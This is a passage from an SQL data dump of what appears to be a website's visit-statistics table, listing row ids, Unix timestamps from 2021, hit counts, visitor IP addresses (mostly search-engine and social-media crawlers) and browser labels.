7.75.147.133','chrome'),(557916,1630347208,1,1,0,0,'46.229.60.107','other'),(557917,1630351255,1,1,0,0,'66.249.66.59','chrome'),(557918,1630352356,1,1,0,0,'66.249.66.57','chrome'),(557919,1630352359,1,0,1,0,'66.249.66.61',''),(557920,1630354023,1,1,0,0,'176.118.150.227','chrome'),(557921,1630355235,1,0,1,0,'66.249.66.61',''),(557922,1630361608,1,1,0,0,'66.249.66.57','chrome'),(557923,1630368963,1,0,1,0,'66.249.66.57',''),(557924,1630414372,1,0,1,0,'66.249.66.59',''),(557925,1630417872,1,1,0,0,'173.252.111.120','other'),(557926,1630419144,1,0,1,0,'66.249.66.57',''),(557927,1630419385,1,1,0,0,'66.249.66.61','chrome'),(557928,1630430266,1,1,0,0,'66.249.66.59','chrome'),(557929,1630459020,1,1,0,0,'66.249.66.57','chrome'),(557930,1630463999,1,1,0,0,'66.249.66.61','chrome'),(557931,1630464352,1,1,0,0,'66.249.66.59','chrome'),(557932,1630482863,1,0,1,0,'66.249.66.59',''),(557933,1630485647,1,0,1,0,'66.249.66.61',''),(557934,1630495601,1,1,0,0,'64.246.161.30','firefox'),(557935,1630497060,1,0,1,0,'66.249.66.61',''),(557936,1630503182,1,1,0,0,'66.249.66.59','chrome'),(557937,1630507052,3,3,0,0,'67.205.61.254','firefox'),(557938,1630518330,2,0,2,0,'66.249.66.59',''),(557939,1630520630,1,1,0,0,'173.252.111.26','other'),(557940,1630520639,1,1,0,0,'173.252.111.13','other'),(557941,1630520640,1,1,0,0,'173.252.111.24','other'),(557942,1630521069,2,2,0,0,'54.203.73.198','firefox'),(557943,1630522199,1,0,1,0,'66.249.66.61',''),(557944,1630522532,1,1,0,0,'66.249.66.59','chrome'),(557945,1630523208,1,1,0,0,'66.249.66.61','chrome'),(557946,1630523502,1,0,1,0,'66.249.66.57',''),(557947,1630527088,1,1,0,0,'66.249.66.61','chrome'),(557948,1630539892,1,1,0,0,'66.249.66.57','chrome'),(557949,1630541248,1,1,0,0,'31.13.103.18','other'),(557950,1630542223,1,0,1,0,'66.249.66.57',''),(557951,1630561797,1,1,0,0,'66.249.66.57','chrome'),(557952,1630566088,1,0,1,0,'66.249.66.59',''),(557953,1630566242,1,0,1,0,'66.249.66.57',''),(557954,1630567914,1,1,0,0,'66.249.66.61','chrome'),(557955,1630568218,1,1,0,0,'66.249.66.59','chrome'),(557956,1630569247,1,0,1,0,'66.249.66.61',''),(557957,1630569248,1,0,1,0,'66.249.66.57',''),(557958,1630580436,1,1,0,0,'66.249.66.59','chrome'),(557959,1630588258,1,1,0,0,'66.249.66.61','chrome'),(557960,1630589144,1,0,1,0,'66.249.66.59',''),(557961,1630602020,1,1,0,0,'66.249.66.61','chrome'),(557962,1630614755,1,1,0,0,'173.249.147.129','firefox'),(557963,1630614796,1,1,0,0,'79.208.22.42','firefox'),(557964,1630617813,1,0,1,0,'66.249.66.59',''),(557965,1630626942,1,1,0,0,'173.252.127.9','other'),(557966,1630643969,1,1,0,0,'66.249.66.61','chrome'),(557967,1630648210,1,0,1,0,'66.249.66.57',''),(557968,1630650884,1,0,1,0,'66.249.66.59',''),(557969,1630652244,2,2,0,0,'66.249.66.57','chrome'),(557970,1630652272,1,1,0,0,'66.249.66.59','chrome'),(557971,1630653132,1,1,0,0,'66.249.66.61','chrome'),(557972,1630660081,1,1,0,0,'66.249.66.57','chrome'),(557973,1630668026,1,1,0,0,'66.249.66.61','chrome'),(557974,1630671731,1,1,0,0,'66.249.66.57','chrome'),(557975,1630672757,1,1,0,0,'66.249.65.207','chrome'),(557976,1630672770,1,1,0,0,'66.249.66.59','chrome'),(557977,1630672813,1,1,0,0,'66.249.66.61','chrome'),(557978,1630675006,1,1,0,0,'66.249.66.59','chrome'),(557979,1630680282,1,0,1,0,'66.249.66.59',''),(557980,1630681533,1,1,0,0,'31.13.115.9','other'),(557981,1630682266,1,1,0,0,'66.249.66.61','chrome'),(557982,1630688753,1,0,1,0,'66.249.66.61',''),(557983,1630692815,1,1,0,0,'173.252.111.7','other'),(557984,1630692816,1,1,0,0,'173.252.111.4','other'),(557985,1630695035,1,1,0,0,'66.249.66.57','chrome'),(557986,1630698125,1,1,0,0,'66.249.66.61','chrome'),(557987,1630698249,1,0,1,0,'66.249.66.59',''),(557988,1630702956,1,1,0,0,'66.249.66.59','chrome'),(557989,1630740198,2,1,1,0,'66.249.66.57',''),(557990,1630740410,1,1,0,0,'66.249.66.61','chrome'),(557991,1630752044,1,1,0,0,'66.249.66.59','chrome'),(557992,1630769766,1,1,0,0,'66.249.66.61','chrome'),(557993,1630771747,1,1,0,0,'77.88.5.214','other'),(557994,1630772436,1,0,1,0,'66.249.66.59',''),(557995,1630775031,1,1,0,0,'173.252.111.21','other'),(557996,1630775032,1,1,0,0,'173.252.111.13','other'),(557997,1630775096,1,1,0,0,'173.252.111.16','other'),(557998,1630775097,1,1,0,0,'173.252.111.3','other'),(557999,1630775098,1,1,0,0,'173.252.111.10','other'),(558000,1630776392,1,0,1,0,'66.249.66.59',''),(558001,1630780270,1,1,0,0,'185.237.217.11','chrome'),(558002,1630781116,1,1,0,0,'173.252.111.9','other'),(558003,1630781117,4,4,0,0,'173.252.111.117','other'),(558004,1630781119,3,3,0,0,'173.252.111.3','other'),(558008,1630781120,1,1,0,0,'173.252.111.21','other'),(558010,1630781121,1,1,0,0,'173.252.111.8','other'),(558011,1630781299,1,1,0,0,'173.252.111.1','other'),(558012,1630781300,2,2,0,0,'173.252.111.22','other'),(558013,1630781301,1,1,0,0,'173.252.111.14','other'),(558014,1630784344,1,1,0,0,'66.249.66.57','chrome'),(558015,1630785925,1,1,0,0,'173.252.111.17','other'),(558018,1630785926,3,3,0,0,'173.252.111.23','other'),(558020,1630785927,1,1,0,0,'173.252.111.9','other'),(558021,1630810651,1,1,0,0,'66.249.66.59','chrome'),(558022,1630811905,1,1,0,0,'66.249.66.61','chrome'),(558023,1630813758,1,1,0,0,'66.249.66.61','chrome'),(558024,1630817365,1,1,0,0,'66.249.66.61','chrome'),(558025,1630820343,1,1,0,0,'66.249.66.57','chrome'),(558026,1630822782,1,1,0,0,'66.249.66.59','chrome'),(558027,1630825729,1,1,0,0,'66.249.66.57','chrome'),(558028,1630827307,1,0,1,0,'66.249.66.61',''),(558029,1630827527,1,1,0,0,'66.249.66.57','chrome'),(558030,1630828152,1,1,0,0,'66.249.66.61','chrome'),(558031,1630829988,1,1,0,0,'66.249.66.57','chrome'),(558032,1630830837,1,0,1,0,'66.249.66.59',''),(558033,1630842362,1,1,0,0,'66.249.66.57','chrome'),(558034,1630864087,1,0,1,0,'66.249.66.57',''),(558035,1630865420,1,1,0,0,'66.249.66.59','chrome'),(558036,1630866604,1,1,0,0,'66.249.66.59','chrome'),(558037,1630868366,1,1,0,0,'66.249.66.57','chrome'),(558038,1630869085,1,1,0,0,'176.118.146.135','chrome'),(558039,1630876765,1,1,0,0,'66.249.66.61','chrome'),(558040,1630880738,1,1,0,0,'66.249.66.59','chrome'),(558041,1630909793,2,2,0,0,'66.249.66.61','chrome'),(558042,1630910113,1,1,0,0,'66.249.66.57','chrome'),(558043,1630910721,1,1,0,0,'66.249.66.61','chrome'),(558044,1630910857,2,2,0,0,'66.249.66.59','chrome'),(558045,1630913780,1,0,1,0,'66.249.66.57',''),(558046,1630913785,1,0,1,0,'66.249.66.59',''),(558047,1630915924,1,1,0,0,'66.249.66.61','chrome'),(558048,1630933189,2,2,0,0,'66.249.66.57','chrome'),(558049,1630933687,1,0,1,0,'66.249.66.59',''),(558050,1630934222,2,2,0,0,'66.249.66.59','chrome'),(558051,1630935235,2,2,0,0,'66.249.66.61','chrome'),(558052,1630939039,1,1,0,0,'66.249.66.59','chrome'),(558053,1630939191,1,1,0,0,'66.249.66.61','chrome'),(558054,1630940816,1,0,1,0,'66.249.66.57',''),(558055,1630941305,1,0,1,0,'66.249.66.61',''),(558056,1630944700,1,1,0,0,'66.249.66.61','chrome'),(558057,1630945239,1,1,0,0,'66.249.66.59','chrome'),(558058,1630946312,1,1,0,0,'66.249.66.59','chrome'),(558059,1630946345,1,1,0,0,'66.249.66.61','chrome'),(558060,1630948191,1,1,0,0,'66.249.66.61','chrome'),(558061,1630948793,1,1,0,0,'66.249.66.57','chrome'),(558062,1630953632,1,1,0,0,'66.249.66.57','chrome'),(558063,1630973321,1,1,0,0,'45.129.198.217','chrome'),(558064,1630973322,1,1,0,0,'45.129.198.217','other'),(558065,1630999189,1,0,1,0,'66.249.66.57',''),(558066,1630999190,3,3,0,0,'104.248.42.100','firefox'),(558067,1631002283,1,1,0,0,'111.193.231.92','chrome'),(558068,1631003997,1,1,0,0,'111.193.231.92','chrome'),(558069,1631013329,1,1,0,0,'66.249.66.59','chrome'),(558070,1631013375,1,1,0,0,'66.249.66.61','chrome'),(558071,1631014154,1,1,0,0,'66.249.66.57','chrome'),(558072,1631014839,1,0,1,0,'66.249.66.61',''),(558073,1631020527,1,1,0,0,'45.129.18.18','chrome'),(558074,1631021315,1,1,0,0,'66.249.66.61','chrome'),(558075,1631040479,1,0,1,0,'66.249.66.59',''),(558076,1631042353,1,1,0,0,'66.249.66.59','chrome'),(558077,1631048227,1,1,0,0,'134.209.43.10','other'),(558078,1631048418,1,1,0,0,'165.227.213.46','other'),(558079,1631085459,1,0,1,0,'66.249.66.59',''),(558080,1631092491,1,1,0,0,'91.196.178.169','chrome'),(558081,1631093298,1,1,0,0,'173.252.111.10','other'),(558082,1631093598,1,1,0,0,'173.252.111.16','other'),(558083,1631093599,1,1,0,0,'173.252.111.19','other'),(558085,1631093600,1,1,0,0,'173.252.111.1','other'),(558086,1631095868,1,1,0,0,'66.249.66.57','chrome'),(558087,1631115080,1,1,0,0,'31.13.115.117','other'),(558088,1631134830,1,1,0,0,'173.252.111.25','other'),(558089,1631142543,1,1,0,0,'66.249.66.57','chrome'),(558090,1631163898,1,1,0,0,'78.46.200.169','other'),(558091,1631165016,1,1,0,0,'78.46.200.169','other'),(558092,1631168328,1,1,0,0,'66.249.66.59','chrome'),(558093,1631170041,1,1,0,0,'66.249.66.37','chrome'),(558094,1631170870,1,0,1,0,'66.249.66.63',''),(558095,1631188465,1,1,0,0,'66.249.66.59','chrome'),(558096,1631194461,1,1,0,0,'31.13.127.17','other'),(558097,1631204968,2,2,0,0,'66.249.66.61','chrome'),(558098,1631205265,1,1,0,0,'66.249.66.59','chrome'),(558099,1631224042,1,1,0,0,'192.162.235.95','chrome'),(558101,1631232910,1,1,0,0,'207.46.13.11','other'),(558102,1631238488,1,1,0,0,'185.237.217.11','chrome'),(558103,1631239156,1,0,1,0,'66.249.66.57',''),(558104,1631252886,1,1,0,0,'54.189.230.128','firefox'),(558105,1631253203,3,3,0,0,'62.210.113.228','firefox'),(558106,1631254177,1,1,0,0,'66.249.66.57','chrome'),(558107,1631257937,1,0,1,0,'66.249.66.59',''),(558108,1631261852,1,1,0,0,'66.249.66.61','chrome'),(558109,1631276097,1,1,0,0,'173.252.111.112','other'),(558110,1631277334,1,0,1,0,'66.249.66.57',''),(558111,1631280345,1,1,0,0,'66.249.66.59','chrome'),(558112,1631284147,2,2,0,0,'46.101.168.174','firefox'),(558114,1631297597,1,1,0,0,'66.249.66.61','chrome'),(558115,1631326063,1,0,1,0,'66.249.66.57',''),(558116,1631353184,1,1,0,0,'173.252.111.118','other'),(558117,1631353185,1,1,0,0,'173.252.111.21','other'),(558118,1631366251,1,1,0,0,'78.25.2.5','chrome'),(558119,1631375829,1,1,0,0,'66.249.66.59','chrome'),(558120,1631395751,1,1,0,0,'66.249.92.57','other'),(558121,1631408865,1,1,0,0,'207.46.13.104','other'),(558122,1631413367,1,0,1,0,'66.249.66.59',''),(558123,1631425622,1,1,0,0,'185.237.217.11','chrome'),(558124,1631433782,1,1,0,0,'185.237.217.11','chrome'),(558125,1631450571,1,1,0,0,'185.237.217.11','chrome'),(558126,1631453298,1,0,1,0,'66.249.66.57',''),(558127,1631459729,1,1,0,0,'66.249.66.57','chrome'),(558128,1631460123,1,1,0,0,'66.249.66.61','chrome'),(558129,1631462506,1,1,0,0,'66.249.66.59','chrome'),(558130,1631464947,1,1,0,0,'185.237.217.11','chrome'),(558131,1631487198,1,0,1,0,'66.249.66.59',''),(558132,1631490603,1,1,0,0,'66.249.66.57','chrome'),(558133,1631490919,2,2,0,0,'66.249.66.59','chrome'),(558134,1631493150,1,1,0,0,'66.249.66.61','chrome'),(558135,1631495379,1,1,0,0,'66.249.66.61','chrome'),(558136,1631498398,1,0,1,0,'66.249.66.57',''),(558137,1631501538,1,0,1,0,'66.249.66.61',''),(558138,1631502257,1,1,0,0,'66.249.66.57','chrome'),(558139,1631506319,1,1,0,0,'66.249.66.57','chrome'),(558140,1631515012,2,1,1,0,'66.249.66.61',''),(558141,1631515694,1,0,1,0,'66.249.66.57',''),(558142,1631516295,1,1,0,0,'66.249.66.59','chrome'),(558143,1631517540,1,1,0,0,'66.249.66.61','chrome'),(558144,1631520420,1,1,0,0,'66.249.66.61','chrome'),(558145,1631520421,1,1,0,0,'66.249.66.57','chrome'),(558146,1631523378,1,1,0,0,'66.249.66.57','chrome'),(558147,1631536251,1,1,0,0,'66.249.66.59','chrome'),(558148,1631554507,1,1,0,0,'173.252.111.116','other'),(558149,1631554508,2,2,0,0,'173.252.111.120','other'),(558151,1631554565,1,1,0,0,'173.252.111.117','other'),(558152,1631555773,1,1,0,0,'35.84.133.193','chrome'),(558153,1631561359,1,1,0,0,'195.245.111.254','chrome'),(558155,1631573736,1,1,0,0,'66.249.66.59','chrome'),(558156,1631574009,2,2,0,0,'66.249.66.57','chrome'),(558157,1631574975,1,1,0,0,'66.249.66.57','chrome'),(558158,1631586638,1,0,1,0,'66.249.66.59',''),(558159,1631595627,2,2,0,0,'185.104.44.73','firefox'),(558161,1631605145,1,1,0,0,'173.252.111.19','other'),(558162,1631605146,1,1,0,0,'173.252.111.2','other'),(558163,1631613017,1,0,1,0,'176.123.4.115',''),(558164,1631628337,1,1,0,0,'173.252.111.16','other'),(558165,1631628338,1,1,0,0,'173.252.111.1','other'),(558166,1631641959,1,1,0,0,'173.252.111.4','other'),(558167,1631652288,1,1,0,0,'66.249.66.59','chrome'),(558168,1631655918,1,1,0,0,'45.129.18.254','chrome'),(558169,1631663542,1,1,0,0,'195.245.111.229','chrome'),(558170,1631663543,1,1,0,0,'195.245.111.229','other'),(558171,1631665928,2,2,0,0,'176.118.144.39','chrome'),(558172,1631672466,1,0,1,0,'66.249.66.61',''),(558173,1631705422,1,1,0,0,'173.252.111.19','other'),(558174,1631705424,1,1,0,0,'173.252.111.4','other'),(558175,1631735948,1,1,0,0,'35.85.54.109','firefox'),(558176,1631747613,1,1,0,0,'176.118.144.39','chrome'),(558178,1631759300,1,0,1,0,'66.249.66.59',''),(558179,1631772620,1,1,0,0,'66.249.66.59','chrome'),(558180,1631783261,1,0,1,0,'66.249.66.57',''),(558181,1631791905,1,1,0,0,'177.72.85.174','other'),(558182,1631799934,2,1,1,0,'66.249.66.61',''),(558183,1631815045,1,1,0,0,'173.252.111.12','other'),(558184,1631845100,1,0,1,0,'66.249.66.129',''),(558185,1631903315,1,1,0,0,'128.124.101.194','chrome'),(558186,1631909067,1,1,0,0,'173.252.111.1','other'),(558187,1631930823,1,0,1,0,'66.249.66.87',''),(558188,1631950254,2,2,0,0,'173.252.111.119','other'),(558189,1631959917,1,1,0,0,'91.196.177.52','chrome'),(558190,1631982464,1,1,0,0,'91.196.178.154','chrome'),(558191,1631991795,1,1,0,0,'91.196.178.178','chrome'),(558192,1631991877,11,11,0,0,'18.222.140.108','chrome'),(558193,1632016304,1,0,1,0,'66.249.66.87',''),(558194,1632047426,1,1,0,0,'173.252.111.116','other'),(558195,1632047427,1,1,0,0,'173.252.111.24','other'),(558196,1632049481,1,0,1,0,'66.249.66.87',''),(558197,1632058276,2,2,0,0,'37.0.11.93','firefox'),(558198,1632081277,1,1,0,0,'192.162.237.53','chrome'),(558199,1632085173,1,1,0,0,'64.111.109.226','firefox'),(558200,1632102057,1,0,1,0,'66.249.66.86',''),(558201,1632102849,1,1,0,0,'66.249.66.87','chrome'),(558202,1632114959,1,1,0,0,'66.249.66.85','chrome'),(558203,1632115309,1,1,0,0,'31.13.127.21','other'),(558204,1632125788,1,1,0,0,'66.249.66.85','chrome'),(558205,1632129207,1,1,0,0,'5.58.70.68','chrome'),(558206,1632134438,1,1,0,0,'66.249.66.86','chrome'),(558207,1632144948,3,3,0,0,'104.197.170.10','firefox'),(558208,1632202112,1,0,1,0,'66.249.66.85',''),(558209,1632215798,1,1,0,0,'194.79.20.247','chrome'),(558210,1632229824,1,1,0,0,'64.246.165.50','firefox'),(558211,1632236958,1,1,0,0,'66.249.66.87','chrome'),(558212,1632252279,2,2,0,0,'192.162.237.53','chrome'),(558213,1632253231,1,1,0,0,'37.55.244.29','chrome'),(558214,1632258348,1,1,0,0,'45.129.18.224','chrome'),(558215,1632262670,1,1,0,0,'51.158.109.3','other'),(558216,1632263848,1,0,1,0,'66.249.66.85',''),(558217,1632263919,1,1,0,0,'66.249.66.87','chrome'),(558218,1632268059,1,1,0,0,'31.13.127.15','other'),(558219,1632290097,1,0,1,0,'66.249.66.86',''),(558220,1632291460,1,1,0,0,'31.13.115.24','other'),(558222,1632291461,2,2,0,0,'31.13.115.2','other'),(558223,1632293965,1,1,0,0,'51.158.118.231','other'),(558224,1632304239,1,1,0,0,'51.15.247.214','other'),(558225,1632313854,1,1,0,0,'69.171.249.5','other'),(558226,1632321287,1,1,0,0,'31.13.103.120','other'),(558227,1632334997,1,0,1,0,'66.249.66.86',''),(558228,1632340011,1,1,0,0,'66.249.66.85','chrome'),(558229,1632343732,1,1,0,0,'77.88.5.40','other'),(558230,1632367478,1,1,0,0,'5.157.130.172','other'),(558231,1632367483,1,1,0,0,'2.56.101.144','other'),(558232,1632373442,1,0,1,0,'66.249.66.85',''),(558233,1632374947,1,0,1,0,'66.249.66.86',''),(558234,1632387932,1,0,1,0,'66.249.66.85',''),(558235,1632395627,1,1,0,0,'46.200.91.169','chrome'),(558236,1632395754,1,1,0,0,'66.249.92.150','other'),(558237,1632436245,1,1,0,0,'66.249.66.85','chrome'),(558238,1632450268,1,1,0,0,'66.249.66.87','chrome'),(558239,1632452683,1,1,0,0,'23.228.109.147','other'),(558240,1632457152,3,3,0,0,'64.227.12.160','firefox'),(558241,1632460289,1,1,0,0,'23.228.109.147','other'),(558242,1632464097,1,1,0,0,'66.249.66.85','chrome'),(558243,1632464509,1,0,1,0,'66.249.66.86',''),(558244,1632473440,1,1,0,0,'5.255.253.101','other'),(558245,1632474321,2,2,0,0,'94.153.60.157','chrome'),(558246,1632480445,1,1,0,0,'66.249.66.86','chrome'),(558247,1632482652,1,1,0,0,'192.162.233.11','chrome'),(558248,1632485919,1,0,1,0,'66.249.66.86',''),(558249,1632513898,1,1,0,0,'66.249.66.87','chrome'),(558250,1632514438,1,1,0,0,'66.249.66.86','chrome'),(558251,1632521741,1,1,0,0,'5.255.253.136','other'),(558252,1632550991,1,1,0,0,'5.255.253.162','other'),(558253,1632560874,1,1,0,0,'5.255.253.136','other'),(558254,1632569613,1,0,1,0,'66.249.66.85',''),(558255,1632582188,4,4,0,0,'109.70.104.23','chrome'),(558256,1632589953,1,1,0,0,'66.249.66.87','chrome'),(558257,1632590712,1,1,0,0,'66.249.66.86','chrome'),(558258,1632591462,1,1,0,0,'173.252.111.21','other'),(558259,1632591584,1,1,0,0,'173.252.111.25','other'),(558260,1632591585,1,1,0,0,'173.252.111.1','other'),(558262,1632591586,1,1,0,0,'173.252.111.117','other'),(558263,1632591618,1,1,0,0,'173.252.111.20','other'),(558264,1632591619,1,1,0,0,'173.252.111.13','other'),(558266,1632591620,1,1,0,0,'173.252.111.119','other'),(558267,1632592096,1,1,0,0,'66.249.66.87','chrome'),(558268,1632620247,1,1,0,0,'5.255.253.136','other'),(558269,1632627082,1,1,0,0,'5.255.253.136','other'),(558270,1632627798,1,1,0,0,'18.237.107.25','chrome'),(558271,1632638612,1,1,0,0,'5.255.253.136','other'),(558272,1632643183,1,1,0,0,'5.255.253.136','other'),(558273,1632649621,1,1,0,0,'5.255.253.136','other'),(558274,1632657244,1,0,1,0,'66.249.66.87',''),(558275,1632658663,1,1,0,0,'92.119.161.233','msie'),(558276,1632658664,1,1,0,0,'92.119.161.233','chrome'),(558277,1632660490,1,1,0,0,'5.255.253.136','other'),(558278,1632661655,1,1,0,0,'66.249.66.87','chrome'),(558279,1632662961,1,1,0,0,'66.249.66.158','chrome'),(558280,1632664506,1,1,0,0,'5.255.253.136','other'),(558281,1632666979,1,0,1,0,'66.249.66.86',''),(558282,1632667885,1,1,0,0,'5.255.253.136','other'),(558283,1632670655,1,0,1,0,'66.249.66.87',''),(558284,1632673741,1,1,0,0,'194.44.241.86','chrome'),(558285,1632678968,1,0,1,0,'66.249.66.9',''),(558286,1632679909,1,1,0,0,'66.249.66.85','chrome'),(558287,1632682735,1,1,0,0,'66.249.66.86','chrome'),(558288,1632684785,1,1,0,0,'66.249.66.86','chrome'),(558289,1632689512,1,1,0,0,'66.249.66.7','chrome'),(558290,1632692699,1,1,0,0,'66.249.66.86','chrome'),(558291,1632711023,4,4,0,0,'35.206.253.134','chrome'),(558292,1632720802,1,0,1,0,'66.249.66.87',''),(558293,1632721174,2,2,0,0,'66.249.66.86','chrome'),(558294,1632721756,1,0,1,0,'66.249.66.85',''),(558295,1632722114,1,1,0,0,'66.249.66.86','chrome'),(558296,1632724876,1,1,0,0,'66.249.66.85','chrome'),(558297,1632725403,1,1,0,0,'66.249.66.87','chrome'),(558298,1632739826,1,1,0,0,'5.255.253.136','other'),(558299,1632742163,1,0,1,0,'66.249.66.85',''),(558300,1632757317,1,1,0,0,'173.252.111.26','other'),(558301,1632760439,1,1,0,0,'66.249.66.87','chrome'),(558302,1632765125,1,1,0,0,'173.252.111.120','other'),(558303,1632765126,1,1,0,0,'173.252.111.2','other'),(558304,1632772928,1,1,0,0,'5.255.253.136','other'),(558305,1632775505,1,1,0,0,'5.255.253.136','other'),(558306,1632782679,1,1,0,0,'66.249.66.219','chrome'),(558307,1632782726,1,1,0,0,'66.249.66.9','chrome'),(558308,1632784381,1,1,0,0,'5.255.253.136','other'),(558309,1632785545,1,1,0,0,'66.249.66.215','chrome'),(558310,1632788955,1,1,0,0,'66.249.66.85','chrome'),(558311,1632789029,2,2,0,0,'66.249.66.86','chrome'),(558312,1632789064,1,1,0,0,'5.255.253.136','other'),(558313,1632789256,1,1,0,0,'66.249.66.87','chrome'),(558314,1632795436,1,1,0,0,'5.255.253.136','other'),(558315,1632796598,1,1,0,0,'66.249.66.219','chrome'),(558316,1632802152,1,1,0,0,'66.249.66.158','chrome'),(558317,1632807697,1,1,0,0,'66.249.66.85','chrome'),(558318,1632808690,1,1,0,0,'5.255.253.136','other'),(558319,1632810625,1,1,0,0,'173.252.111.14','other'),(558320,1632842915,1,0,1,0,'66.249.66.85',''),(558321,1632859388,1,1,0,0,'5.255.253.136','other'),(558322,1632861505,14,14,0,0,'5.255.253.136','other'),(558323,1632861582,1,1,0,0,'5.255.253.136','chrome'),(558324,1632861585,1,1,0,0,'87.250.224.128','chrome'),(558325,1632861633,1,1,0,0,'87.250.224.164','other'),(558326,1632861635,12,12,0,0,'87.250.224.128','other'),(558327,1632862461,1,1,0,0,'5.255.253.136','other'),(558328,1632862589,1,1,0,0,'95.108.213.57','chrome'),(558329,1632862590,1,1,0,0,'87.250.224.37','other'),(558330,1632862601,2,2,0,0,'5.255.253.164','other'),(558331,1632862602,2,2,0,0,'5.255.253.162','other'),(558332,1632862619,1,1,0,0,'141.8.142.80','other'),(558333,1632862665,1,1,0,0,'87.250.224.128','other'),(558334,1632862666,1,1,0,0,'87.250.224.5','other'),(558335,1632863849,2,2,0,0,'87.250.224.164','other'),(558337,1632863851,1,1,0,0,'87.250.224.5','other'),(558338,1632863853,2,2,0,0,'5.255.253.136','other'),(558339,1632864725,1,1,0,0,'87.250.224.128','other'),(558340,1632867080,1,1,0,0,'66.249.66.5','chrome'),(558341,1632868757,1,1,0,0,'23.88.96.38','other'),(558342,1632873055,1,1,0,0,'87.250.224.128','other'),(558343,1632892964,1,1,0,0,'157.55.39.162','other'),(558344,1632894832,1,1,0,0,'87.250.224.128','other'),(558345,1632911339,1,1,0,0,'5.255.253.136','other'),(558346,1632914065,1,1,0,0,'77.75.147.133','chrome'),(558347,1632916993,2,2,0,0,'192.162.233.11','chrome'),(558348,1632929114,1,0,1,0,'66.249.66.86',''),(558349,1632929626,1,1,0,0,'66.249.66.86','chrome'),(558350,1632929865,1,1,0,0,'87.250.224.128','other'),(558351,1632931818,1,1,0,0,'66.249.66.86','chrome'),(558352,1632934408,46,46,0,0,'20.55.59.90','chrome'),(558353,1632937438,1,1,0,0,'87.250.224.159','other'),(558354,1632941816,1,1,0,0,'69.171.249.11','other'),(558355,1632947069,1,1,0,0,'66.249.66.158','chrome'),(558356,1632956988,1,1,0,0,'66.249.66.159','chrome'),(558357,1632957249,1,1,0,0,'109.70.106.130','other'),(558358,1632959129,1,1,0,0,'213.180.203.172','other'),(558359,1632961572,1,1,0,0,'66.249.66.86','chrome'),(558360,1632970423,1,1,0,0,'103.81.87.29','firefox'),(558361,1632971049,1,1,0,0,'66.249.66.86','chrome'),(558362,1632974205,1,1,0,0,'52.149.226.163','other'),(558363,1632977761,1,1,0,0,'112.200.134.32','other'),(558364,1632978924,1,1,0,0,'157.55.39.162','other'),(558365,1632982419,1,1,0,0,'87.250.224.22','other'),(558366,1632984974,1,1,0,0,'87.250.224.35','other'),(558367,1632986982,3,3,0,0,'162.142.125.59','other'),(558368,1632987128,6,6,0,0,'185.67.34.1','firefox'),(558370,1632987131,4,4,0,0,'185.67.34.1','other'),(558371,1632988938,1,1,0,0,'65.154.226.165','chrome'),(558372,1632989057,3,3,0,0,'167.248.133.41','other'),(558373,1632991001,1,1,0,0,'66.249.66.86','chrome'),(558374,1632992737,1,1,0,0,'87.250.224.22','other'),(558375,1632996184,1,1,0,0,'159.65.245.224','other'),(558376,1633000386,1,1,0,0,'91.196.178.169','chrome'),(558377,1633001352,1,1,0,0,'91.196.178.169','chrome'),(558378,1633001429,1,1,0,0,'173.252.111.1','other'),(558379,1633001430,1,1,0,0,'173.252.111.9','other'),(558382,1633001431,2,2,0,0,'173.252.111.23','other'),(558383,1633001436,1,1,0,0,'173.252.111.12','other'),(558384,1633001437,1,1,0,0,'173.252.95.20','other'),(558385,1633001438,1,1,0,0,'173.252.111.17','other'),(558386,1633001439,1,1,0,0,'173.252.111.7','other'),(558388,1633001441,1,1,0,0,'173.252.111.117','other'),(558389,1633001489,1,1,0,0,'173.252.87.7','other'),(558390,1633001542,1,1,0,0,'5.45.207.124','other'),(558391,1633001561,1,1,0,0,'185.237.217.11','chrome'),(558392,1633001636,1,1,0,0,'46.164.153.23','other'),(558393,1633001741,1,1,0,0,'95.133.192.35','chrome'),(558394,1633001777,1,1,0,0,'173.252.111.16','other'),(558395,1633002108,1,1,0,0,'185.237.217.17','chrome'),(558396,1633002630,1,1,0,0,'91.196.178.40','chrome'),(558397,1633002958,1,1,0,0,'46.211.72.78','chrome'),(558398,1633004939,1,1,0,0,'91.196.178.205','chrome'),(558399,1633004999,1,1,0,0,'87.250.224.22','other'),(558400,1633005418,1,1,0,0,'91.196.178.169','chrome'),(558401,1633005731,1,1,0,0,'87.250.224.35','other'),(558402,1633006512,1,1,0,0,'178.133.235.125','chrome'),(558403,1633007817,1,1,0,0,'66.249.66.87','chrome'),(558404,1633009008,1,1,0,0,'91.196.178.58','chrome'),(558405,1633009293,1,1,0,0,'91.196.178.179','other'),(558406,1633009295,1,1,0,0,'173.252.107.8','other'),(558408,1633009296,1,1,0,0,'173.252.107.19','other'),(558411,1633009297,1,1,0,0,'173.252.107.7','other'),(558413,1633009644,1,1,0,0,'91.196.176.13','chrome'),(558414,1633010877,1,1,0,0,'54.221.27.173','chrome'),(558415,1633014377,1,1,0,0,'91.196.176.13','chrome'),(558416,1633014582,1,1,0,0,'46.211.35.213','chrome'),(558417,1633016502,1,1,0,0,'95.164.9.28','chrome'),(558418,1633017051,1,0,1,0,'66.249.66.86',''),(558419,1633017660,1,1,0,0,'87.250.224.22','other'),(558420,1633018204,2,2,0,0,'66.249.66.85','chrome'),(558421,1633019722,1,1,0,0,'87.250.224.22','other'),(558422,1633020118,1,1,0,0,'185.237.217.11','chrome'),(558423,1633020355,1,1,0,0,'66.220.149.21','other'),(558424,1633020356,1,1,0,0,'66.220.149.40','other'),(558425,1633021750,1,1,0,0,'185.237.217.11','chrome'),(558426,1633022094,1,1,0,0,'66.249.66.7','chrome'),(558427,1633022967,1,1,0,0,'185.237.217.7','firefox'),(558428,1633023503,1,1,0,0,'66.249.66.158','chrome'),(558430,1633023507,2,2,0,0,'66.249.66.217','chrome'),(558431,1633025522,2,2,0,0,'179.61.128.184','chrome'),(558432,1633025523,2,2,0,0,'176.113.43.30','chrome'),(558433,1633026244,1,1,0,0,'128.124.143.235','chrome'),(558434,1633027163,1,1,0,0,'66.249.66.221','chrome'),(558435,1633030825,1,1,0,0,'173.252.111.119','other'),(558436,1633031234,1,1,0,0,'69.171.231.116','other'),(558437,1633034110,2,2,0,0,'45.131.92.56','chrome'),(558438,1633034111,2,2,0,0,'176.113.42.24','chrome'),(558439,1633034164,1,1,0,0,'87.250.224.22','other'),(558440,1633034243,1,1,0,0,'3.235.55.243','firefox'),(558441,1633034265,1,0,1,0,'66.249.66.7',''),(558442,1633036456,1,1,0,0,'173.252.111.9','other'),(558443,1633036457,1,1,0,0,'173.252.111.10','other'),(558444,1633036888,1,1,0,0,'91.196.178.34','other'),(558445,1633042237,1,1